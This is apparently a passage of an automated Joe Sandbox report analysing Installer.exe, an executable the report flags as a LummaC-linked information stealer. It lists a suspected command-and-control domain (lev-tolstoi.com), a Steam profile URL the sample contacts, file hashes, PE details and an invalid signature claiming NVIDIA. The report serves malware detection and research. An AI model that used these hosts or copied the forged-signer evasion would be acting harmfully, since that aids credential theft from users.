                                                                                                                                                                                                                          https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high

                                                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                                                              Public IPs

                                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                              104.21.66.86
                                                                                                                                                                                                                              		lev-tolstoi.comUnited States
                                                                                                                                                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                              23.55.153.106
                                                                                                                                                                                                                              		steamcommunity.comUnited States
                                                                                                                                                                                                                              		20940AKAMAI-ASN1EUfalse

                                                                                                                                                                                                                              General Information

                                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                              Analysis ID:1581507
                                                                                                                                                                                                                              Start date and time:2024-12-27 23:12:30 +01:00
                                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                              Overall analysis duration:0h 6m 7s
                                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                              Run name:Run with higher sleep bypass
                                                                                                                                                                                                                              Number of analysed new started processes analysed:8
                                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                                              Sample name:Installer.exe
                                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@6/1@11/2
                                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                                              • Successful, ratio: 66.7%
                                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                                              • Successful, ratio: 98%
                                                                                                                                                                                                                              • Number of executed functions: 59
                                                                                                                                                                                                                              • Number of non-executed functions: 170
                                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                                                                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                                                                                                              • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                                                                                                                                                                              Warnings

                                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63
                                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                              • Execution Graph export aborted for target Installer.exe, PID 7480 because there are no executed function
                                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                              • VT rate limit hit for: Installer.exe

                                                                                                                                                                                                                              Simulations

                                                                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                                                                              No simulations

                                                                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                                                                              IPs

                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                              104.21.66.86MV ROCKET_PDA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                              • www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
                                                                                                                                                                                                                              23.55.153.106Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                w22319us3M.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                  T4qO1i2Jav.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                    FXdg37pY22.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      FXdg37pY22.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                        k0ukcEH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          5uVReRlvME.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, StealcBrowse
                                                                                                                                                                                                                                            8WRONDszv4.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                                                                                                                                                                                                                              z3IxCpcpg4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                GtEVo1eO2p.exeGet hashmaliciousLummaCBrowse

                                                                                                                                                                                                                                                  Domains

                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                  lev-tolstoi.comSoftWare(1).exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  ForcesLangi.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  Leside-.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  Vq50tK1Nx2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  IzDjbVdHha.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                                  T4qO1i2Jav.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                                  FXdg37pY22.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  k0ukcEH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                                  pVbAZEFIpI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                                  GxX48twWHA.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  steamcommunity.comSoftWare(1).exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                                                  ForcesLangi.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 92.122.104.90
                                                                                                                                                                                                                                                  Leside-.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 92.122.104.90
                                                                                                                                                                                                                                                  Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 104.121.10.34
                                                                                                                                                                                                                                                  Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  Vq50tK1Nx2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.121.10.34
                                                                                                                                                                                                                                                  IzDjbVdHha.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.121.10.34
                                                                                                                                                                                                                                                  T4qO1i2Jav.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  FXdg37pY22.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106

                                                                                                                                                                                                                                                  ASNs

                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                  AKAMAI-ASN1EUSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  w22319us3M.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  T4qO1i2Jav.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  FXdg37pY22.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  FXdg37pY22.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  grand-theft-auto-5-theme-1-installer_qb8W-j1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 184.85.182.130
                                                                                                                                                                                                                                                  k0ukcEH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  5uVReRlvME.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, StealcBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  8WRONDszv4.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  aD7D9fkpII.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  • 23.209.72.25
                                                                                                                                                                                                                                                  CLOUDFLARENETUSphish_alert_iocp_v1.4.48 - 2024-12-27T140703.193.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 104.18.11.207
                                                                                                                                                                                                                                                  SoftWare(1).exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                                                                                                                                                                                  • 104.21.73.97
                                                                                                                                                                                                                                                  NewSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 172.67.157.249
                                                                                                                                                                                                                                                  ForcesLangi.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  iviewers.dllGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.60.24
                                                                                                                                                                                                                                                  http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=hGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                  • 104.17.25.14
                                                                                                                                                                                                                                                  launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.58.80
                                                                                                                                                                                                                                                  Leside-.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  solara-executor.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 172.67.75.163

                                                                                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                  a0e9f5d64349fb13191bc781f81f42e1SoftWare(1).exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  NewSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  ForcesLangi.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  iviewers.dllGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  Leside-.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  search.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  • 23.55.153.106

                                                                                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                                                                                  No context

                                                                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                                                                  \Device\ConDrv

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Installer.exe
                                                                                                                                                                                                                                                  File Type:assembler source, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):14402
                                                                                                                                                                                                                                                  Entropy (8bit):4.874636730022465
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:vlICCmV5fTMzsM3qlICCmV5fTMzsM3ip9guFx2rBhiLfmfU:vGCC+dMOGCC+dMY9guFx2rBo
                                                                                                                                                                                                                                                  MD5:DF0EFD0545733561C6E165770FB3661C
                                                                                                                                                                                                                                                  SHA1:0F3AD477176CF235C6C59EE2EB15D81DCB6178A8
                                                                                                                                                                                                                                                  SHA-256:A434B406E97A2C892FA88C3975D8181EBEA62A8DA919C5221409E425DF50FD17
                                                                                                                                                                                                                                                  SHA-512:3FF527435BC8BCF2640E0B64725CC0DB8A801D912698D4D94C44200529268B80AA7B59A2E2A2EA6C4621E09AA249AAA3583A8D90E4F5D7B68E0E6FFFEB759918
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:AcquireSRWLockExclusive..AcquireSRWLockShared..ActivateActCtx..ActivateActCtxWorker..AddAtomA..AddAtomW..AddConsoleAliasA..AddConsoleAliasW..AddDllDirectory..AddIntegrityLabelToBoundaryDescriptor..AddLocalAlternateComputerNameA..AddLocalAlternateComputerNameW..AddRefActCtx..AddRefActCtxWorker..AddResourceAttributeAce..AddSIDToBoundaryDescriptor..AddScopedPolicyIDAce..AddSecureMemoryCacheCallback..AddVectoredContinueHandler..AddVectoredExceptionHandler..AdjustCalendarDate..AllocConsole..AllocateUserPhysicalPages..AllocateUserPhysicalPagesNuma..AppPolicyGetClrCompat..AppPolicyGetCreateFileAccess..AppPolicyGetLifecycleManagement..AppPolicyGetMediaFoundationCodecLoading..AppPolicyGetProcessTerminationMethod..AppPolicyGetShowDeveloperDiagnostic..AppPolicyGetThreadInitializationType..AppPolicyGetWindowingModel..AppXGetOSMaxVersionTested..ApplicationRecoveryFinished..ApplicationRecoveryInProgress..AreFileApisANSI..AssignProcessToJobObject..AttachConsole..BackupRead..BackupSeek..BackupWrite..B

                                                                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Entropy (8bit):7.576095801286095
                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                  File name:Installer.exe
                                                                                                                                                                                                                                                  File size:577'064 bytes
                                                                                                                                                                                                                                                  MD5:0cebf27d0066d6ea5653547254e236e4
                                                                                                                                                                                                                                                  SHA1:badfc5a68c17d2d1112e50ccd8ececeb4f8ba8a9
                                                                                                                                                                                                                                                  SHA256:21d9bba7ae0dfb0892e5345ee42d73e241e0d9841a17ff340f6278e86d8f54f4
                                                                                                                                                                                                                                                  SHA512:5590c096ba88b0e4b5dcb246930853a619216bc8135e799c92c194525299bc8fb6b941dec480d1b293eee6f5e7adc2d663ae483d86c8708d3f9be04fa4180a46
                                                                                                                                                                                                                                                  SSDEEP:12288:+YO6Dqzihouxpa+yWz2qRPmZqaKS6gfb3e82ffYDXCOEO:nO6DThou2+y02TZqa97b3effIXXt
                                                                                                                                                                                                                                                  TLSH:77C4E1123680C0B3D963153759B9C7794A3EF8201F616AC793984BBEDEB06D15F30A6E
                                                                                                                                                                                                                                                  File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....ng..........................................@..................................|....@.................................|j..<..

                                                                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                                                                  Icon Hash:90cececece8e8eb0

                                                                                                                                                                                                                                                  Static PE Info

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Entrypoint:0x4104a0
                                                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                                                  Digitally signed:true
                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                  Subsystem:windows cui
                                                                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                  Time Stamp:0x676E98E6 [Fri Dec 27 12:09:10 2024 UTC]
                                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                                  OS Version Major:6
                                                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                                                  File Version Major:6
                                                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                                                  Subsystem Version Major:6
                                                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                                                  Import Hash:96d90e8808da099bc17e050394f447e7

                                                                                                                                                                                                                                                  Authenticode Signature

                                                                                                                                                                                                                                                  Signature Valid:false
                                                                                                                                                                                                                                                  Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                  Error Number:-2146869232
                                                                                                                                                                                                                                                  Not Before, Not After
                                                                                                                                                                                                                                                  • 12/01/2023 19:00:00 16/01/2026 18:59:59
                                                                                                                                                                                                                                                  Subject Chain
                                                                                                                                                                                                                                                  • CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
                                                                                                                                                                                                                                                  Version:3
                                                                                                                                                                                                                                                  Thumbprint MD5:5F1B6B6C408DB2B4D60BAA489E9A0E5A
                                                                                                                                                                                                                                                  Thumbprint SHA-1:15F760D82C79D22446CC7D4806540BF632B1E104
                                                                                                                                                                                                                                                  Thumbprint SHA-256:28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
                                                                                                                                                                                                                                                  Serial:0997C56CAA59055394D9A9CDB8BEEB56

                                                                                                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                                                  call 00007EFDFCAE445Ah
                                                                                                                                                                                                                                                  jmp 00007EFDFCAE42BDh
                                                                                                                                                                                                                                                  mov ecx, dword ptr [0043B680h]
                                                                                                                                                                                                                                                  push esi
                                                                                                                                                                                                                                                  push edi
                                                                                                                                                                                                                                                  mov edi, BB40E64Eh
                                                                                                                                                                                                                                                  mov esi, FFFF0000h
                                                                                                                                                                                                                                                  cmp ecx, edi
                                                                                                                                                                                                                                                  je 00007EFDFCAE4456h
                                                                                                                                                                                                                                                  test esi, ecx
                                                                                                                                                                                                                                                  jne 00007EFDFCAE4478h
                                                                                                                                                                                                                                                  call 00007EFDFCAE4481h
                                                                                                                                                                                                                                                  mov ecx, eax
                                                                                                                                                                                                                                                  cmp ecx, edi
                                                                                                                                                                                                                                                  jne 00007EFDFCAE4459h
                                                                                                                                                                                                                                                  mov ecx, BB40E64Fh
                                                                                                                                                                                                                                                  jmp 00007EFDFCAE4460h
                                                                                                                                                                                                                                                  test esi, ecx
                                                                                                                                                                                                                                                  jne 00007EFDFCAE445Ch
                                                                                                                                                                                                                                                  or eax, 00004711h
                                                                                                                                                                                                                                                  shl eax, 10h
                                                                                                                                                                                                                                                  or ecx, eax
                                                                                                                                                                                                                                                  mov dword ptr [0043B680h], ecx
                                                                                                                                                                                                                                                  not ecx
                                                                                                                                                                                                                                                  pop edi
                                                                                                                                                                                                                                                  mov dword ptr [0043B6C0h], ecx
                                                                                                                                                                                                                                                  pop esi
                                                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                                                                  sub esp, 14h
                                                                                                                                                                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                                                  xorps xmm0, xmm0
                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                  movlpd qword ptr [ebp-0Ch], xmm0
                                                                                                                                                                                                                                                  call dword ptr [00436D00h]
                                                                                                                                                                                                                                                  mov eax, dword ptr [ebp-08h]
                                                                                                                                                                                                                                                  xor eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                                                  mov dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                                  call dword ptr [00436CB8h]
                                                                                                                                                                                                                                                  xor dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                                  call dword ptr [00436CB4h]
                                                                                                                                                                                                                                                  xor dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                                  lea eax, dword ptr [ebp-14h]
                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                  call dword ptr [00436D50h]
                                                                                                                                                                                                                                                  mov eax, dword ptr [ebp-10h]
                                                                                                                                                                                                                                                  lea ecx, dword ptr [ebp-04h]
                                                                                                                                                                                                                                                  xor eax, dword ptr [ebp-14h]
                                                                                                                                                                                                                                                  xor eax, dword ptr [ebp-04h]
                                                                                                                                                                                                                                                  xor eax, ecx
                                                                                                                                                                                                                                                  leave
                                                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                                                  mov eax, 00004000h
                                                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                                                  push 0043CF48h
                                                                                                                                                                                                                                                  call dword ptr [00436D28h]
                                                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                                                  push 00030000h
                                                                                                                                                                                                                                                  push 00010000h
                                                                                                                                                                                                                                                  push 00000000h
                                                                                                                                                                                                                                                  call 00007EFDFCAEB233h
                                                                                                                                                                                                                                                  add esp, 0Ch

                                                                                                                                                                                                                                                  Data Directories

                                                                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x36a7c0x3c.rdata
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x8f0000x3fc.rsrc
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x8a8000x2628.bss
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x3f0000x2744.reloc
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x326080x18.rdata
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2ea980xc0.rdata
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x36c3c0x184.rdata
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                  Sections

                                                                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                  .text0x10000x2b4ca0x2b600ebf84c6b836020b1a66433a898baeab7False0.5443702719740634data6.596404756541432IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                  .rdata0x2d0000xc50c0xc60096e76e7ef084461591b1dcd4c2131f05False0.40260022095959597data4.741850626178578IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                  .data0x3a0000x37140x2800d87fd4546a2b39263a028b496b33108fFalse0.29814453125data5.024681407682101IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                  .tls0x3e0000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                  .reloc0x3f0000x27440x2800c7508b57e36483307c47b7dd73fc0c85False0.75166015625data6.531416896423856IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                  .bss0x420000x4d0000x4d000a20e827dffb35f9fff89825936fba1a1False1.0003360896915585data7.999398974295207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                  .rsrc0x8f0000x3fc0x4006d588082959117d83b5b94b45915208aFalse0.4423828125data3.391431520369637IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                  Resources

                                                                                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                  RT_VERSION0x8f0580x3a4dataEnglishUnited States0.44849785407725323

                                                                                                                                                                                                                                                  Imports

                                                                                                                                                                                                                                                  DLLImport
